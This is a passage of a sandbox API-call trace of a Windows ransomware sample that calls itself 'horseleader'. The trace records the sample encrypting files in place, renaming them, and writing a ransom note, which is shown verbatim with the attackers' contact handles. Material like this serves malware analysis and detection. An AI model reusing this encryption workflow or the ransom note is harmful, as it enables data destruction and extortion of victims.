StrStrIW (lpFirst="msdia90.dll", lpSrch=".horseleader") returned 0x0 [0250.468] lstrcmpW (lpString1="msdia90.dll", lpString2="#Decrypt#.txt") returned 1 [0250.468] lstrcmpW (lpString1="msdia90.dll", lpString2="_uninstalling_.png") returned 1 [0250.468] lstrlenW (lpString=".testttjffg") returned 11 [0250.468] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll", lpSrch=".testttjffg") returned 0x0 [0250.468] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.469] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.469] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0250.469] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll") returned 65 [0250.469] StrStrW (lpFirst="msdia90.dll", lpSrch=".txt") returned 0x0 [0250.469] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=855376) returned 1 [0250.470] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.470] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.475] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.475] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.476] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x65ea8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.477] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.479] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.479] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.479] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xcbd50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.479] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.482] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.482] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.482] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.482] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0250.482] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0250.483] CloseHandle (hObject=0x158) returned 1 [0250.483] GetProcessHeap () returned 0x780000 [0250.483] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0250.483] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll.horseleader") returned 77 [0250.483] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll.horseleader")) returned 1 [0250.485] GetProcessHeap () returned 0x780000 [0250.485] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0250.485] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1c53c00, ftCreationTime.dwHighDateTime=0x1cbfdf3, ftLastAccessTime.dwLowDateTime=0xbd2c6940, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xc1c53c00, ftLastWriteTime.dwHighDateTime=0x1cbfdf3, nFileSizeHigh=0x0, nFileSizeLow=0xd0d50, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msdia90.dll", cAlternateFileName="")) returned 0 [0250.485] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0250.485] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\#Decrypt#.txt") returned 67 [0250.485] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0250.488] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0250.488] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0250.490] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0250.490] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0250.490] CloseHandle (hObject=0x21c) returned 1 [0250.490] GetProcessHeap () returned 0x780000 [0250.490] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0250.490] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x803feff7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x803feff7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="VGX", cAlternateFileName="")) returned 1 [0250.490] lstrcmpiW (lpString1="VGX", lpString2="Windows") returned -1 [0250.491] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX") returned 54 [0250.491] lstrcmpW (lpString1="VGX", lpString2=".") returned 1 [0250.491] lstrcmpW (lpString1="VGX", lpString2="..") returned 1 [0250.491] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.491] GetProcessHeap () returned 0x780000 [0250.491] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0250.491] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\*") returned 56 [0250.491] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x803feff7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x803feff7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0250.492] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.492] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\.") returned 56 [0250.492] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.492] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x803feff7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x803feff7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0250.492] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.492] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\..") returned 57 [0250.493] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.493] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.493] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee7a7ff6, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xee7a7ff6, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x454d7b80, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x10f200, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="VGX.dll", cAlternateFileName="")) returned 1 [0250.493] lstrcmpiW (lpString1="VGX.dll", lpString2="Windows") returned -1 [0250.493] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\VGX.dll") returned 62 [0250.493] StrStrIW (lpFirst="VGX.dll", lpSrch=".horseleader") returned 0x0 [0250.493] lstrcmpW (lpString1="VGX.dll", lpString2="#Decrypt#.txt") returned 1 [0250.493] lstrcmpW (lpString1="VGX.dll", lpString2="_uninstalling_.png") returned 1 [0250.493] lstrlenW (lpString=".testttjffg") returned 11 [0250.493] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\VGX.dll", lpSrch=".testttjffg") returned 0x0 [0250.493] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.493] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.494] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\VGX.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx\\vgx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.495] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee7a7ff6, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xee7a7ff6, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x454d7b80, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x10f200, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="VGX.dll", cAlternateFileName="")) returned 0 [0250.495] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0250.495] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\#Decrypt#.txt") returned 68 [0250.495] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0250.496] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0250.496] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0250.497] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0250.497] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0250.498] CloseHandle (hObject=0x21c) returned 1 [0250.498] GetProcessHeap () returned 0x780000 [0250.498] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0250.498] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Visio Shared", cAlternateFileName="VISIOS~1")) returned 1 [0250.498] lstrcmpiW (lpString1="Visio Shared", lpString2="Windows") returned -1 [0250.498] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared") returned 63 [0250.498] lstrcmpW (lpString1="Visio Shared", lpString2=".") returned 1 [0250.498] lstrcmpW (lpString1="Visio Shared", lpString2="..") returned 1 [0250.498] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.498] GetProcessHeap () returned 0x780000 [0250.499] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0250.499] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\*") returned 65 [0250.499] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0250.499] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.500] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\.") returned 65 [0250.500] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.500] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0250.500] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.500] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\..") returned 66 [0250.500] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.500] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.500] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x8541dd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x8541dd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Fonts", cAlternateFileName="")) returned 1 [0250.500] lstrcmpiW (lpString1="Fonts", lpString2="Windows") returned -1 [0250.500] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts") returned 69 [0250.500] lstrcmpW (lpString1="Fonts", lpString2=".") returned 1 [0250.501] lstrcmpW (lpString1="Fonts", lpString2="..") returned 1 [0250.501] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.501] GetProcessHeap () returned 0x780000 [0250.501] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0250.501] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio 